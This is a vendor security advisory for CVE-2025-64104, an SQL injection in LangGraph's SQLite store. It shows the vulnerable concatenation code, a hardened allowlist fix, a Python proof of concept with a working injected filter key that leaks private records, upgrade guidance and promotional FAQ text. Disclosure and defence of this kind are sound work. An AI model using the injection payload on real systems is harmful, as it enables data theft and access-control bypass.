Summary
LangGraph's SQLite store implementation contains SQL injection vulnerabilities caused by direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.
Details
/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py
The key portion of the JSON path is concatenated directly into the SQL string without sanitization. There are a few different occurrences within the file.
filter_conditions.append(
    "json_extract(value, '$."
    + key  # <-- Directly concatenated, no escaping!
    + "') = '"
    + value.replace("'", "''")  # <-- Only value is escaped
    + "'"
)
Who is affected
This issue affects only developers or projects that directly use the checkpoint-sqlite store.
An application is vulnerable only if it:
- Instantiates the SqliteStore from the checkpoint-sqlite package, and
- Builds the filter argument using keys derived from untrusted or user-supplied input (such as query parameters, request bodies, or other external data).
If filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.
Note: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.
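To make the allowlisting point above concrete, here is an added example (not code from LangGraph or from the advisory) that rebuilds the vulnerable json_extract filter from the Details section against a stand-in table and sets it beside a hardened builder that allowlists filter keys and binds the JSON path as a parameter. The store table, ALLOWED_KEYS and the function names are assumptions; the injected key is the one from the PoC.

```python
import sqlite3

# Constructed stand-in rows mirroring the PoC data; not the project's real schema.
ROWS = [
    ("public", '{"access": "public", "data": "public info"}'),
    ("private", '{"access": "private", "data": "secret", "password": "123"}'),
]

# Hypothetical allowlist of the filter keys the application actually supports.
ALLOWED_KEYS = {"access", "data"}

def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE store (key TEXT, value TEXT)")
    conn.executemany("INSERT INTO store VALUES (?, ?)", ROWS)
    return conn

def search_vulnerable(filters):
    """Same pattern as the advisory: the key lands unescaped inside the JSON path."""
    conds = [
        "json_extract(value, '$." + key + "') = '" + value.replace("'", "''") + "'"
        for key, value in filters.items()
    ]
    sql = "SELECT key FROM store WHERE " + " AND ".join(conds)
    return [row[0] for row in _db().execute(sql)]

def search_hardened(filters):
    """Reject keys outside the allowlist, then bind path and value as parameters."""
    conds, params = [], []
    for key, value in filters.items():
        if key not in ALLOWED_KEYS:
            raise ValueError(f"unsupported filter key: {key!r}")
        conds.append("json_extract(value, ?) = ?")
        params += ["$." + key, value]
    sql = "SELECT key FROM store WHERE " + " AND ".join(conds)
    return [row[0] for row in _db().execute(sql, params)]

# The injected key from the advisory's PoC.
MALICIOUS_KEY = "access') = 'public' OR '1'='1' OR json_extract(value, '$."

def demo():
    """Returns (keys leaked by the vulnerable builder, whether the hardened one refused)."""
    leaked = search_vulnerable({MALICIOUS_KEY: "dummy"})
    try:
        search_hardened({MALICIOUS_KEY: "dummy"})
        refused = False
    except ValueError:
        refused = True
    return leaked, refused
```

Run demo() to see the vulnerable builder return the private row while the hardened builder rejects the key before any SQL is executed.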
PoC
#!/usr/bin/env python3
"""Minimal SQLite Key Injection POC for LangGraph"""
from langgraph.store.sqlite import SqliteStore

# Create store with test data
with SqliteStore.from_conn_string(":memory:") as store:
    store.setup()
    # Add public and private documents
    store.put(("docs",), "public", {"access": "public", "data": "public info"})
    store.put(("docs",), "private", {"access": "private", "data": "secret", "password": "123"})

    # Normal query - returns 1 public document
    normal = store.search(("docs",), filter={"access": "public"})
    print(f"Normal query: {len(normal)} docs")

    # SQL injection via malicious key
    malicious_key = "access') = 'public' OR '1'='1' OR json_extract(value, '$."
    injected = store.search(("docs",), filter={malicious_key: "dummy"})
    print(f"Injected query: {len(injected)} docs")
    for doc in injected:
        if doc.value.get("access") == "private":
            print(f"LEAKED: {doc.value}")
Impact
Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access. Typical impact: data disclosure or modification.
CVE-2025-64104 has a CVSS score of 7.3 (High). The vector requires local access and low privileges, with no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.0.11); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-64104? CVE-2025-64104 is a high-severity SQL injection vulnerability in langgraph-checkpoint-sqlite (pip), affecting versions <= 2.0.10. It is fixed in 2.0.11. Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access.
- How severe is CVE-2025-64104? CVE-2025-64104 has a CVSS score of 7.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of langgraph-checkpoint-sqlite are affected by CVE-2025-64104? langgraph-checkpoint-sqlite (pip) versions <= 2.0.10 are affected.
- Is there a fix for CVE-2025-64104? Yes. CVE-2025-64104 is fixed in 2.0.11. Upgrade to this version or later.
- Is CVE-2025-64104 exploitable, and should I be worried? Whether CVE-2025-64104 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2025-64104 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-64104? Upgrade langgraph-checkpoint-sqlite to 2.0.11 or later.